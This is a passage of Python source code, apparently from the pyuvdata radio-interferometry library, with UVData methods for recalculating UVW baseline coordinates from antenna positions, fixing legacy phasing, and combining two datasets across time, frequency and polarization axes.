frame="altaz",
location=telescope_location,
)
obs_zenith_coord = zenith_coord.transform_to(phase_frame)
zenith_ra = obs_zenith_coord.ra.rad
zenith_dec = obs_zenith_coord.dec.rad
self.phase(
zenith_ra,
zenith_dec,
epoch="J2000",
phase_frame=phase_frame,
use_ant_pos=use_ant_pos,
use_old_proj=use_old_proj,
allow_rephase=allow_rephase,
orig_phase_frame=orig_phase_frame,
select_mask=select_mask,
cat_name=("zenith_at_jd%f" % self.time_array[0])
if self.multi_phase_center
else None,
)
def set_uvws_from_antenna_positions(
self,
allow_phasing=False,
require_phasing=True,
orig_phase_frame=None,
output_phase_frame="icrs",
use_old_proj=False,
):
"""
Calculate UVWs based on antenna_positions.
Parameters
----------
allow_phasing : bool
Option for phased data. If data is phased and allow_phasing=True,
UVWs will be calculated and the visibilities will be rephased. Default
is False.
require_phasing : bool
Option for phased data. If data is phased and require_phasing=True, the
method will raise an error unless allow_phasing=True. If both
`require_phasing=False` and `allow_phasing=False`, the UVWs will be
recalculated but the data will NOT be rephased. This feature should only be
used in limited circumstances (e.g., when certain metadata like exact time
are not trusted), as misuse can significantly corrupt data.
orig_phase_frame : str
The astropy frame to phase from. Either 'icrs' or 'gcrs'.
Defaults to using the 'phase_center_frame' attribute or 'icrs' if
that attribute is None. Only used if allow_phasing is True and use_old_proj
is True.
output_phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'. Only used if
allow_phasing is True, and use_old_proj is True.
use_old_proj : bool
If set to True, uses the 'old' method of calculating baseline vectors.
Default is False, which will instead use the 'new' method.
Raises
------
ValueError
If data is phased and allow_phasing is False.
Warns
-----
UserWarning
If the phase_type is 'phased'
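Examples
--------
A minimal usage sketch (assumes `uvd` is a UVData object already in memory;
the variable name is illustrative)::

    # recompute the uvws from the antenna positions; if the data are phased,
    # allow_phasing=True lets the visibilities be rephased to match
    uvd.set_uvws_from_antenna_positions(allow_phasing=True)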
"""
if not use_old_proj and not (
self.phase_center_app_ra is None or self.phase_center_app_dec is None
):
if (self.phase_type == "phased") and (
not (allow_phasing) and require_phasing
):
raise ValueError(
"UVW recalculation requires either unphased data or the ability "
"to rephase data. Use unphase_to_drift or set allow_phasing=True."
)
telescope_location = self.telescope_location_lat_lon_alt
new_uvw = uvutils.calc_uvw(
app_ra=self.phase_center_app_ra,
app_dec=self.phase_center_app_dec,
frame_pa=self.phase_center_frame_pa,
lst_array=self.lst_array,
use_ant_pos=True,
antenna_positions=self.antenna_positions,
antenna_numbers=self.antenna_numbers,
ant_1_array=self.ant_1_array,
ant_2_array=self.ant_2_array,
telescope_lat=telescope_location[0],
telescope_lon=telescope_location[1],
from_enu=(self.phase_type != "phased"),
to_enu=(self.phase_type != "phased"),
)
if self.phase_type == "phased":
if allow_phasing:
old_w_vals = self.uvw_array[:, 2].copy()
old_w_vals[self._check_for_unphased()] = 0.0
self._apply_w_proj(new_uvw[:, 2], old_w_vals)
else:
warnings.warn(
"Recalculating uvw_array without adjusting visibility phases "
"-- this can introduce significant errors if used incorrectly."
)
# If the data are phased, the visibility phases have already been adjusted
# above, so all that remains is to update the uvws.
self.uvw_array = new_uvw
return
# multi-phase-center datasets should never use the 'old' uvw calculation method
if self.multi_phase_center:
raise NotImplementedError(
"Multi phase center data sets are not compatible with the old uvw "
"calculation method, please set use_old_proj=False."
)
phase_type = self.phase_type
if phase_type == "phased":
if allow_phasing:
if not self.metadata_only:
warnings.warn(
"Data will be unphased and rephased "
"to calculate UVWs, which might introduce small "
"inaccuracies to the data."
)
if orig_phase_frame not in [None, "icrs", "gcrs"]:
raise ValueError(
"Invalid parameter orig_phase_frame. "
'Options are "icrs", "gcrs", or None.'
)
if output_phase_frame not in ["icrs", "gcrs"]:
raise ValueError(
"Invalid parameter output_phase_frame. "
'Options are "icrs" or "gcrs".'
)
phase_center_ra = self.phase_center_ra
phase_center_dec = self.phase_center_dec
phase_center_epoch = self.phase_center_epoch
self.unphase_to_drift(
phase_frame=orig_phase_frame, use_old_proj=True,
)
else:
raise ValueError(
"UVW calculation requires unphased data. "
"Use unphase_to_drift or set "
"allow_phasing=True."
)
antenna_locs_ENU, _ = self.get_ENU_antpos(center=False)
# This code used to loop over every baseline in the unique baseline array,
# find the index of ant1 and ant2 in the antenna number array, and fill out
# self.uvw_array for all matching blts. Instead, get the indices and reverse
# indices from np.unique, build the unique ant1 and ant2 arrays, use
# searchsorted to find the index of each antenna number, create the unique
# uvw array, and then broadcast it back out to self.uvw_array.
bls, unique_inds, reverse_inds = np.unique(
self.baseline_array, return_index=True, return_inverse=True
)
# antenna_numbers does not necessarily need to be in order on the object
# but needs to be in order for the searchsorted to work.
# ant1_index and ant2_index arrays will preserve the order of blts
ant_sort = np.argsort(self.antenna_numbers)
ant1_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_1_array[unique_inds],
)
ant2_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_2_array[unique_inds],
)
_uvw_array = np.zeros((bls.size, 3))
_uvw_array = (
antenna_locs_ENU[ant_sort][ant2_index, :]
- antenna_locs_ENU[ant_sort][ant1_index, :]
)
self.uvw_array = _uvw_array[reverse_inds]
if phase_type == "phased":
self.phase(
phase_center_ra,
phase_center_dec,
phase_center_epoch,
phase_frame=output_phase_frame,
use_old_proj=use_old_proj,
)
def fix_phase(
self, use_ant_pos=True,
):
"""
Fix the data to be consistent with the new phasing method.
This is a simple utility function for updating UVW coordinates calculated using
the 'old' phasing algorithm with those calculated by the 'new' algorithm. Note
that this step is required for using the new methods with data phased using the
`phase` method prior to pyuvdata v2.2.
Parameters
----------
use_ant_pos : bool
Use the antenna positions for determining UVW coordinates. Default is True.
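Examples
--------
A minimal usage sketch (assumes `uvd` is a UVData object that was phased
with the pre-v2.2 `phase` method; the variable name is illustrative)::

    # recompute the uvws (and rephase the data) to match the new algorithm
    uvd.fix_phase(use_ant_pos=True)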
"""
# If we are missing apparent coordinates, we should calculate those now
if (self.phase_center_app_ra is None) or (self.phase_center_app_dec is None):
self._set_app_coords_helper()
# If we are just using the antenna positions, we don't actually need to do
# anything, since the new baseline vectors are unaffected by the prior
# phasing method and the delta_w values are already corrected for properly.
if use_ant_pos:
self.set_uvws_from_antenna_positions(
allow_phasing=True, use_old_proj=False,
)
elif self.multi_phase_center:
raise ValueError(
"Cannot run fix_phase on a mutli-phase-ctr dataset without using the "
"antenna positions. Please set use_ant_pos=True."
)
else:
# Record the old values
phase_center_ra = self.phase_center_ra
phase_center_dec = self.phase_center_dec
phase_center_frame = self.phase_center_frame
phase_center_epoch = self.phase_center_epoch
cat_name = self.object_name
# Bring the UVWs back to ENU/unphased
self.unphase_to_drift(
phase_frame=self.phase_center_frame,
use_ant_pos=False,
use_old_proj=True,
)
# Check for any autos, since their uvws get potentially corrupted
# by the above operation
auto_mask = self.ant_1_array == self.ant_2_array
if any(auto_mask):
self.uvw_array[auto_mask, :] = 0.0
# And rephase the data using the new algorithm
self.phase(
phase_center_ra,
phase_center_dec,
phase_frame=phase_center_frame,
epoch=phase_center_epoch,
cat_name=cat_name,
use_ant_pos=False,
)
def __add__(
self,
other,
inplace=False,
phase_center_radec=None,
unphase_to_drift=False,
phase_frame="icrs",
orig_phase_frame=None,
use_ant_pos=True,
verbose_history=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
make_multi_phase=False,
ignore_name=False,
):
"""
Combine two UVData objects along frequency, polarization and/or baseline-time.
Parameters
----------
other : UVData object
Another UVData object which will be added to self.
inplace : bool
If True, overwrite self as we go, otherwise create a third object
as the sum of the two.
phase_center_radec : array_like of float
The phase center to phase the files to before adding the objects in
radians (in the ICRS frame). Note that if this keyword is not set
and the two UVData objects are phased to different phase centers
or if one is phased and one is drift, this method will error
because the objects are not compatible.
unphase_to_drift : bool
If True, unphase the objects to drift before combining them.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & aberration.
Only used if `phase_center_radec` is set.
orig_phase_frame : str
The original phase frame of the data (if it is already phased). Used
for unphasing, only if `unphase_to_drift` or `phase_center_radec`
are set. Defaults to using the 'phase_center_frame' attribute or
'icrs' if that attribute is None.
use_ant_pos : bool
If True, calculate the phased or unphased uvws directly from the
antenna positions rather than from the existing uvws.
Only used if `unphase_to_drift` or `phase_center_radec` are set.
verbose_history : bool
Option to allow more verbose history. If True and if the histories for the
two objects are different, the combined object will keep all the history of
both input objects (if many objects are combined in succession this can
lead to very long histories). If False and if the histories for the two
objects are different, the combined object will have the history of the
first object and only the parts of the second object history that are unique
(this is done word by word and can result in hard to interpret histories).
run_check : bool
Option to check for the existence and proper shapes of parameters
after combining objects.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
combining objects.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
make_multi_phase : bool
Option to make the output a multi phase center dataset, capable of holding
data on multiple phase centers. Setting this to true will allow for two
UVData objects to be combined, even if the phase center properties do not
agree (so long as the names are unique for each phase center). Default is
False.
ignore_name : bool
Option to ignore the name of the phase center (`cat_name` in
`phase_center_catalog` when `multi_phase_center=True`, otherwise
`object_name`) when combining two UVData objects. Doing so effectively
adopts the name found in the first UVData object in the sum. Default is
False.
Raises
------
ValueError
If other is not a UVData object, self and other are not compatible
or if data in self and other overlap. One way they can not be
compatible is if they have different phasing, in that case set
`unphase_to_drift` or `phase_center_radec` to (un)phase them so they
are compatible.
If `phase_center_radec` is not None and is not length 2.
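Examples
--------
A minimal usage sketch (assumes `uvd1` and `uvd2` are compatible UVData
objects already in memory; the variable names are illustrative)::

    # out-of-place combine (the + operator calls this method)
    combined = uvd1 + uvd2

    # explicit call, e.g. to unphase both objects to drift before combining
    combined = uvd1.__add__(uvd2, unphase_to_drift=True)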
"""
if inplace:
this = self
else:
this = self.copy()
# Check that both objects are UVData and valid
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not issubclass(other.__class__, this.__class__):
if not issubclass(this.__class__, other.__class__):
raise ValueError(
"Only UVData (or subclass) objects can be "
"added to a UVData (or subclass) object"
)
other.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
# Check to make sure that both objects are consistent w/ use of flex_spw
if this.flex_spw != other.flex_spw:
raise ValueError(
"To combine these data, flex_spw must be set to the same "
"value (True or False) for both objects."
)
# check that both objects have the same array shapes
if this.future_array_shapes != other.future_array_shapes:
raise ValueError(
"Both objects must have the same `future_array_shapes` parameter. "
"Use the `use_future_array_shapes` or `use_current_array_shapes` "
"methods to convert them."
)
if phase_center_radec is not None and unphase_to_drift:
raise ValueError(
"phase_center_radec cannot be set if unphase_to_drift is True."
)
if unphase_to_drift:
if this.phase_type != "drift":
warnings.warn("Unphasing this UVData object to drift")
this.unphase_to_drift(
phase_frame=orig_phase_frame, use_ant_pos=use_ant_pos
)
if other.phase_type != "drift":
warnings.warn("Unphasing other UVData object to drift")
other.unphase_to_drift(
phase_frame=orig_phase_frame, use_ant_pos=use_ant_pos
)
if phase_center_radec is not None:
if np.array(phase_center_radec).size != 2:
raise ValueError("phase_center_radec should have length 2.")
# If this object is not phased or is not phased close to
# phase_center_radec, (re)phase it.
# Close is defined using the phase_center_ra/dec tolerances.
if this.phase_type == "drift" or (
not np.isclose(
this.phase_center_ra,
phase_center_radec[0],
rtol=this._phase_center_ra.tols[0],
atol=this._phase_center_ra.tols[1],
)
or not np.isclose(
this.phase_center_dec,
phase_center_radec[1],
rtol=this._phase_center_dec.tols[0],
atol=this._phase_center_dec.tols[1],
)
):
warnings.warn("Phasing this UVData object to phase_center_radec")
this.phase(
phase_center_radec[0],
phase_center_radec[1],
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
allow_rephase=True,
)
# If other object is not phased or is not phased close to
# phase_center_radec, (re)phase it.
# Close is defined using the phase_center_ra/dec tolerances.
if other.phase_type == "drift" or (
not np.isclose(
other.phase_center_ra,
phase_center_radec[0],
rtol=other._phase_center_ra.tols[0],
atol=other._phase_center_ra.tols[1],
)
or not np.isclose(
other.phase_center_dec,
phase_center_radec[1],
rtol=other._phase_center_dec.tols[0],
atol=other._phase_center_dec.tols[1],
)
):
warnings.warn("Phasing other UVData object to phase_center_radec")
other.phase(
phase_center_radec[0],
phase_center_radec[1],
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
allow_rephase=True,
)
# Define parameters that must be the same to add objects
# But the phase_center parameters should match too, even in drift mode (where they are empty)
compatibility_params = [
"_vis_units",
"_telescope_name",
"_instrument",
"_telescope_location",
"_phase_type",
"_Nants_telescope",
"_antenna_names",
"_antenna_numbers",
"_antenna_positions",
"_phase_center_frame",
"_phase_center_epoch",
]
if not this.future_array_shapes and not this.flex_spw:
compatibility_params.append("_channel_width")
multi_obj_check = False
if this.multi_phase_center == other.multi_phase_center:
# If the names are different and we are making a multi-phase-center data
# set, then we can skip the step of checking the ra and dec; otherwise we
# need to check them.
multi_obj_check = make_multi_phase or this.multi_phase_center
if not ((this.object_name != other.object_name) and multi_obj_check):
compatibility_params.append("_phase_center_ra")
compatibility_params.append("_phase_center_dec")
# Also, if we are not supposed to ignore the name, then make sure that it's
# one of the parameters we check for compatibility.
if not (ignore_name or multi_obj_check):
compatibility_params.append("_object_name")
elif not (this.multi_phase_center or make_multi_phase):
raise ValueError(
"To combine these data, please run the add operation with the UVData "
"object with multi_phase_center set to True as the first object in the "
"add operation."
)
# Build up history string
history_update_string = " Combined data along "
n_axes = 0
# Create blt arrays for convenience
prec_t = -2 * np.floor(np.log10(this._time_array.tols[-1])).astype(int)
prec_b = 8
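# Each blt key is "<time>_<baseline>", e.g. "2458838.500000_00000257" (values
# made up): the time is formatted with prec_t decimal places (set by the time
# tolerance) and the baseline number is zero-padded to prec_b digits, so
# string equality matches time/baseline pairs exactly.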
this_blts = np.array(
[
"_".join(
["{1:.{0}f}".format(prec_t, blt[0]), str(blt[1]).zfill(prec_b)]
)
for blt in zip(this.time_array, this.baseline_array)
]
)
other_blts = np.array(
[
"_".join(
["{1:.{0}f}".format(prec_t, blt[0]), str(blt[1]).zfill(prec_b)]
)
for blt in zip(other.time_array, other.baseline_array)
]
)
# Check we don't have overlapping data
both_pol, this_pol_ind, other_pol_ind = np.intersect1d(
this.polarization_array, other.polarization_array, return_indices=True
)
# If we have a flexible spectral window, the handling here is a bit more
# involved, because we are allowed to have channels with the same frequency
# *if* they belong to different spectral windows (one real-life example: you
# might want to preserve guard bands in the correlator, which can have
# overlapping RF frequency channels)
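# For example (made-up values): spw 1 could cover 100-120 MHz and spw 2 could
# cover 118-138 MHz, so a channel at 119 MHz can legitimately appear in both
# windows. Frequencies are therefore only treated as overlapping when they
# occur within the same spectral window, which is what the loop below does.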
if this.flex_spw:
this_freq_ind = np.array([], dtype=np.int64)
other_freq_ind = np.array([], dtype=np.int64)
both_freq = np.array([], dtype=float)
both_spw = np.intersect1d(this.spw_array, other.spw_array)
for idx in both_spw:
this_mask = np.where(this.flex_spw_id_array == idx)[0]
other_mask = np.where(other.flex_spw_id_array == idx)[0]
if this.future_array_shapes:
both_spw_freq, this_spw_ind, other_spw_ind = np.intersect1d(
this.freq_array[this_mask],
other.freq_array[other_mask],
return_indices=True,
)
else:
both_spw_freq, this_spw_ind, other_spw_ind = np.intersect1d(
this.freq_array[0, this_mask],
other.freq_array[0, other_mask],
return_indices=True,
)
this_freq_ind = np.append(this_freq_ind, this_mask[this_spw_ind])
other_freq_ind = np.append(other_freq_ind, other_mask[other_spw_ind])
both_freq = np.append(both_freq, both_spw_freq)
else:
if this.future_array_shapes:
both_freq, this_freq_ind, other_freq_ind = np.intersect1d(
this.freq_array, other.freq_array, return_indices=True
)
else:
both_freq, this_freq_ind, other_freq_ind = np.intersect1d(
this.freq_array[0, :], other.freq_array[0, :], return_indices=True
)
both_blts, this_blts_ind, other_blts_ind = np.intersect1d(
this_blts, other_blts, return_indices=True
)
if not self.metadata_only and (
len(both_pol) > 0 and len(both_freq) > 0 and len(both_blts) > 0
):
# check whether the overlapping data are invalid (all zero and flagged),
# in which case they can safely be overwritten
if this.future_array_shapes:
this_inds = np.ravel_multi_index(
(
this_blts_ind[:, np.newaxis, np.newaxis],
this_freq_ind[np.newaxis, :, np.newaxis],
this_pol_ind[np.newaxis, np.newaxis, :],
),
this.data_array.shape,
).flatten()
other_inds = np.ravel_multi_index(
(
other_blts_ind[:, np.newaxis, np.newaxis],
other_freq_ind[np.newaxis, :, np.newaxis],
other_pol_ind[np.newaxis, np.newaxis, :],
),
other.data_array.shape,
).flatten()
else:
this_inds = np.ravel_multi_index(
(
this_blts_ind[:, np.newaxis, np.newaxis, np.newaxis],
np.zeros((1, 1, 1, 1), dtype=np.int64),
this_freq_ind[np.newaxis, np.newaxis, :, np.newaxis],
this_pol_ind[np.newaxis, np.newaxis, np.newaxis, :],
),
this.data_array.shape,
).flatten()
other_inds = np.ravel_multi_index(
(
other_blts_ind[:, np.newaxis, np.newaxis, np.newaxis],
np.zeros((1, 1, 1, 1), dtype=np.int64),
other_freq_ind[np.newaxis, np.newaxis, :, np.newaxis],
other_pol_ind[np.newaxis, np.newaxis, np.newaxis, :],
),
other.data_array.shape,
).flatten()
this_all_zero = np.all(this.data_array.flatten()[this_inds] == 0)
this_all_flag = np.all(this.flag_array.flatten()[this_inds])
other_all_zero = np.all(other.data_array.flatten()[other_inds] == 0)
other_all_flag = np.all(other.flag_array.flatten()[other_inds])
if this_all_zero and this_all_flag:
# we're fine to overwrite; update history accordingly
history_update_string = " Overwrote invalid data using pyuvdata."
this.history += history_update_string
elif other_all_zero and other_all_flag:
raise ValueError(
"To combine these data, please run the add operation again, "
"but with the object whose data is to be overwritten as the "
"first object in the add operation."
)
else:
raise ValueError(
"These objects have overlapping data and cannot be combined."
)
# find the blt indices in "other" but not in "this"
temp = np.nonzero(~np.in1d(other_blts, this_blts))[0]
if len(temp) > 0:
bnew_inds = temp
new_blts = other_blts[temp]
history_update_string += "baseline-time"
n_axes += 1
else:
bnew_inds, new_blts = ([], [])
# if there's any overlap in blts, check extra params
temp = np.nonzero(np.in1d(other_blts, this_blts))[0]
if len(temp) > 0:
# add metadata to be checked to compatibility params
extra_params = [
"_integration_time",
"_uvw_array",
"_lst_array",
"_phase_center_app_ra",
"_phase_center_app_dec",
"_phase_center_frame_pa",
"_phase_center_id_array",
"_phase_center_catalog",
"_Nphase",
]
compatibility_params.extend(extra_params)
if not ignore_name and ("_object_name" not in compatibility_params):
compatibility_params.append("_object_name")
# TODO: Add handling for what happens when you have two different source
# catalogs that you want to combine
# find the freq indices in "other" but not in "this"
if self.flex_spw:
other_mask = np.ones_like(other.flex_spw_id_array, dtype=bool)
for idx in np.intersect1d(this.spw_array, other.spw_array):
if this.future_array_shapes:
other_mask[other.flex_spw_id_array == idx] = np.isin(
other.freq_array[other.flex_spw_id_array == idx],
this.freq_array[this.flex_spw_id_array == idx],
invert=True,
)
else:
other_mask[other.flex_spw_id_array == idx] = np.isin(
other.freq_array[0, other.flex_spw_id_array == idx],
this.freq_array[0, this.flex_spw_id_array == idx],
invert=True,
)
temp = np.where(other_mask)[0]
else:
if this.future_array_shapes:
temp = np.nonzero(~np.in1d(other.freq_array, this.freq_array))[0]
else:
temp = np.nonzero(
~np.in1d(other.freq_array[0, :], this.freq_array[0, :])
)[0]
if len(temp) > 0:
fnew_inds = temp
if n_axes > 0:
history_update_string += ", frequency"
else:
history_update_string += "frequency"
n_axes += 1
else:
fnew_inds = []
# if channel width is an array and there's any overlap in freqs,
# check extra params
if this.future_array_shapes or this.flex_spw:
if this.future_array_shapes:
temp = np.nonzero(np.in1d(other.freq_array, this.freq_array))[0]
else:
temp = np.nonzero(
np.in1d(other.freq_array[0, :], this.freq_array[0, :])
)[0]
if len(temp) > 0:
# add metadata to be checked to compatibility params
extra_params = ["_channel_width"]
compatibility_params.extend(extra_params)
# find the pol indices in "other" but not in "this"
temp = np.nonzero(~np.in1d(other.polarization_array, this.polarization_array))[
0
]
if len(temp) > 0:
pnew_inds = temp
if n_axes > 0:
history_update_string += ", polarization"
else:
history_update_string += "polarization"
n_axes += 1
else:
pnew_inds = []
# Actually check compatibility parameters
for cp in compatibility_params:
if cp == "_integration_time":
# only check that overlapping blt indices match
params_match = np.allclose(
this.integration_time[this_blts_ind],
other.integration_time[other_blts_ind],
rtol=this._integration_time.tols[0],
atol=this._integration_time.tols[1],
)
elif cp == "_uvw_array":
# only check that overlapping blt indices match
params_match = np.allclose(
this.uvw_array[this_blts_ind, :],
other.uvw_array[other_blts_ind, :],
rtol=this._uvw_array.tols[0],
atol=this._uvw_array.tols[1],
)
elif cp == "_lst_array":
# only check that overlapping blt indices match
params_match = np.allclose(
this.lst_array[this_blts_ind],
other.lst_array[other_blts_ind],
rtol=this._lst_array.tols[0],
atol=this._lst_array.tols[1],
)
elif cp == "_channel_width" and this.future_array_shapes or this.flex_spw:
# only check that overlapping freq indices match
params_match = np.allclose(
this.channel_width[this_freq_ind],
other.channel_width[other_freq_ind],
rtol=this._channel_width.tols[0],
atol=this._channel_width.tols[1],
)
elif (cp == "_phase_center_app_ra") and (this.phase_type == "phased"):
# only check that overlapping blt indices match
params_match = np.allclose(
this.phase_center_app_ra[this_blts_ind],
other.phase_center_app_ra[other_blts_ind],
rtol=this._phase_center_app_ra.tols[0],
atol=this._phase_center_app_ra.tols[1],
)
elif (cp == "_phase_center_app_dec") and (this.phase_type == "phased"):
# only check that overlapping blt indices match
params_match = np.allclose(
this.phase_center_app_dec[this_blts_ind],
other.phase_center_app_dec[other_blts_ind],
rtol=this._phase_center_app_dec.tols[0],
atol=this._phase_center_app_dec.tols[1],
)
elif (cp == "_phase_center_frame_pa") and (this.phase_type == "phased"):
# only check that overlapping blt indices match
params_match = np.allclose(
this.phase_center_frame_pa[this_blts_ind],
other.phase_center_frame_pa[other_blts_ind],
rtol=this._phase_center_frame_pa.tols[0],
atol=this._phase_center_frame_pa.tols[1],
)
else:
params_match = getattr(this, cp) == getattr(other, cp)
if not params_match:
msg = (
"UVParameter " + cp[1:] + " does not match. Cannot combine objects."
)
if cp[1:] == "object_name":
msg += (
" This can potentially be remedied by setting "
"ignore_name=True, or by allowing the creation of a "
"mutli-phase-ctr dataset (by setting make_multi_phase=True)."
)
raise ValueError(msg)
# At this point, we are assuming that the two data sets are _mostly_
# compatible. The last thing we need to check is whether, if these are
# multi-phase-center data sets, their phase center catalogs are compatible.
if this.multi_phase_center or make_multi_phase:
if other.multi_phase_center:
other_names = list(other.phase_center_catalog.keys())
other_cat = other.phase_center_catalog
else:
other_names = [other.object_name]
other_cat = {
other_names[0]: {
"cat_type": "sidereal",
"cat_lon": other.phase_center_ra,
"cat_lat": other.phase_center_dec,
"cat_frame": other.phase_center_frame,
"cat_epoch": other.phase_center_epoch,
},
}
for name in other_names:
cat_id, cat_diffs = this._look_in_catalog(
name, phase_dict=other_cat[name]
)
if (cat_id is not None) and (cat_diffs != 0):
# We have a name conflict, raise an error now
raise ValueError(
"There exists a target named %s in both objects in the "
"sum, but their properties are different. Use the rename_"
"phase_center method in order to rename it in one object."
% name
)
# Begin manipulating the objects.
if make_multi_phase and (not this.multi_phase_center):
this._set_multi_phase_center(preserve_phase_center_info=True)
if other.multi_phase_center:
# Collect the catalog IDs already used by other, so that anything added to
# or renumbered in this catalog does not collide with them.
reserved_ids = [
other.phase_center_catalog[name]["cat_id"]
for name in other.phase_center_catalog.keys()
]
# In the first loop, look at the sources that are in this but not in other,
# since we need to choose catalog IDs that won't collide with the IDs
# already used in the other catalog.
for name in this.phase_center_catalog.keys():
if name not in other.phase_center_catalog.keys():
this._update_phase_center_id(name, reserved_ids=reserved_ids)
# Next loop, we want to update the IDs of sources that are in both
for name in this.phase_center_catalog.keys():
if name in other.phase_center_catalog.keys():
this._update_phase_center_id(
name, new_cat_id=other.phase_center_catalog[name]["cat_id"],
)
# Finally, add those other objects not found in this
for name in other.phase_center_catalog.keys():
if name not in this.phase_center_catalog.keys():
this._add_phase_center(
name,
cat_type=other.phase_center_catalog[name]["cat_type"],
cat_lon=other.phase_center_catalog[name]["cat_lon"],
cat_lat=other.phase_center_catalog[name]["cat_lat"],
cat_frame=other.phase_center_catalog[name]["cat_frame"],
cat_epoch=other.phase_center_catalog[name]["cat_epoch"],
cat_times=other.phase_center_catalog[name]["cat_times"],
cat_pm_ra=other.phase_center_catalog[name]["cat_pm_ra"],
cat_pm_dec=other.phase_center_catalog[name]["cat_pm_dec"],
cat_dist=other.phase_center_catalog[name]["cat_dist"],
cat_vrad=other.phase_center_catalog[name]["cat_vrad"],
info_source=other.phase_center_catalog[name]["info_source"],
cat_id=other.phase_center_catalog[name]["cat_id"],
)
elif this.multi_phase_center:
# If other is not multi phase center, then we'll go ahead and add the object
# information here.
other_cat_id = this._add_phase_center(
other.object_name,
cat_type="sidereal",
cat_lon=other.phase_center_ra,
cat_lat=other.phase_center_dec,
cat_frame=other.phase_center_frame,
cat_epoch=other.phase_center_epoch,
)
# Pad out self to accommodate new data
if len(bnew_inds) > 0:
this_blts = np.concatenate((this_blts, new_blts))
blt_order = np.argsort(this_blts)
if not self.metadata_only:
if this.future_array_shapes:
zero_pad = np.zeros((len(bnew_inds), this.Nfreqs, this.Npols))
else:
zero_pad = np.zeros((len(bnew_inds), 1, this.Nfreqs, this.Npols))
this.data_array = np.concatenate([this.data_array, zero_pad], axis=0)
this.nsample_array = np.concatenate(
[this.nsample_array, zero_pad], axis=0
)
this.flag_array = np.concatenate(
[this.flag_array, 1 - zero_pad], axis=0
).astype(np.bool_)
this.uvw_array = np.concatenate(
[this.uvw_array, other.uvw_array[bnew_inds, :]], axis=0
)[blt_order, :]
this.time_array = np.concatenate(
[this.time_array, other.time_array[bnew_inds]]
)[blt_order]
this.integration_time = np.concatenate(
[this.integration_time, other.integration_time[bnew_inds]]
)[blt_order]
this.lst_array = np.concatenate(
[this.lst_array, other.lst_array[bnew_inds]]
)[blt_order]
this.ant_1_array = np.concatenate(
[this.ant_1_array, other.ant_1_array[bnew_inds]]
)[blt_order]
this.ant_2_array = np.concatenate(
[this.ant_2_array, other.ant_2_array[bnew_inds]]
)[blt_order]
this.baseline_array = np.concatenate(
[this.baseline_array, other.baseline_array[bnew_inds]]
)[blt_order]
if this.phase_type == "phased":
this.phase_center_app_ra = np.concatenate(
[this.phase_center_app_ra, other.phase_center_app_ra[bnew_inds]]
)[blt_order]
this.phase_center_app_dec = np.concatenate(
[this.phase_center_app_dec, other.phase_center_app_dec[bnew_inds]]
)[blt_order]
this.phase_center_frame_pa = np.concatenate(
[this.phase_center_frame_pa, other.phase_center_frame_pa[bnew_inds]]
)[blt_order]
if this.multi_phase_center:
if other.multi_phase_center:
this.phase_center_id_array = np.concatenate(
[
this.phase_center_id_array,
other.phase_center_id_array[bnew_inds],
]
)[blt_order]
else:
this.phase_center_id_array = np.concatenate(
[this.phase_center_id_array, [other_cat_id] * len(bnew_inds)]
)[blt_order]
if len(fnew_inds) > 0:
if this.future_array_shapes:
this.freq_array = np.concatenate(
[this.freq_array, other.freq_array[fnew_inds]]
)
else:
this.freq_array = np.concatenate(
[this.freq_array, other.freq_array[:, fnew_inds]], axis=1
)
if this.flex_spw or this.future_array_shapes:
this.channel_width = np.concatenate(
[this.channel_width, other.channel_width[fnew_inds]]
)
if this.flex_spw:
this.flex_spw_id_array = np.concatenate(
[this.flex_spw_id_array, other.flex_spw_id_array[fnew_inds]]
)
this.spw_array = np.concatenate([this.spw_array, other.spw_array])
# We want to preserve per-spw information based on first appearance
# in the concatenated array.
unique_index = np.sort(
np.unique(this.flex_spw_id_array, return_index=True)[1]
)
this.spw_array = this.flex_spw_id_array[unique_index]
this.Nspws = len(this.spw_array)
# If we have a flex/multi-spw data set, need to sort out the order of the
# individual windows first.
if this.flex_spw:
f_order = np.concatenate(
[
np.where(this.flex_spw_id_array == idx)[0]
for idx in sorted(this.spw_array)
]
)
# With spectral windows sorted, check and see if channels within
# windows need sorting. If they are ordered in ascending or descending
# fashion, leave them be. If not, sort in ascending order
for idx in this.spw_array:
select_mask = this.flex_spw_id_array[f_order] == idx
check_freqs = (
this.freq_array[f_order[select_mask]]
if this.future_array_shapes
else this.freq_array[0, f_order[select_mask]]
)
if (not np.all(check_freqs[1:] > check_freqs[:-1])) and (
not np.all(check_freqs[1:] < check_freqs[:-1])
):
subsort_order = f_order[select_mask]
f_order[select_mask] = subsort_order[np.argsort(check_freqs)]
else:
if this.future_array_shapes:
f_order = np.argsort(this.freq_array)
else:
f_order = np.argsort(this.freq_array[0, :])
if not self.metadata_only:
if this.future_array_shapes:
zero_pad = np.zeros(
(this.data_array.shape[0], len(fnew_inds), this.Npols)
)
this.data_array = np.concatenate(
[this.data_array, zero_pad], axis=1
)
this.nsample_array = np.concatenate(
[this.nsample_array, zero_pad], axis=1
)
this.flag_array = np.concatenate(
[this.flag_array, 1 - zero_pad], axis=1
).astype(np.bool_)
else:
zero_pad = np.zeros(
(this.data_array.shape[0], 1, len(fnew_inds), this.Npols)
)
this.data_array = np.concatenate(
[this.data_array, zero_pad], axis=2
)
this.nsample_array = np.concatenate(
[this.nsample_array, zero_pad], axis=2
)
this.flag_array = np.concatenate(
[this.flag_array, 1 - zero_pad], axis=2
).astype(np.bool_)
if len(pnew_inds) > 0:
this.polarization_array = np.concatenate(
[this.polarization_array, other.polarization_array[pnew_inds]]
)
p_order = np.argsort(np.abs(this.polarization_array))
if not self.metadata_only:
if this.future_array_shapes:
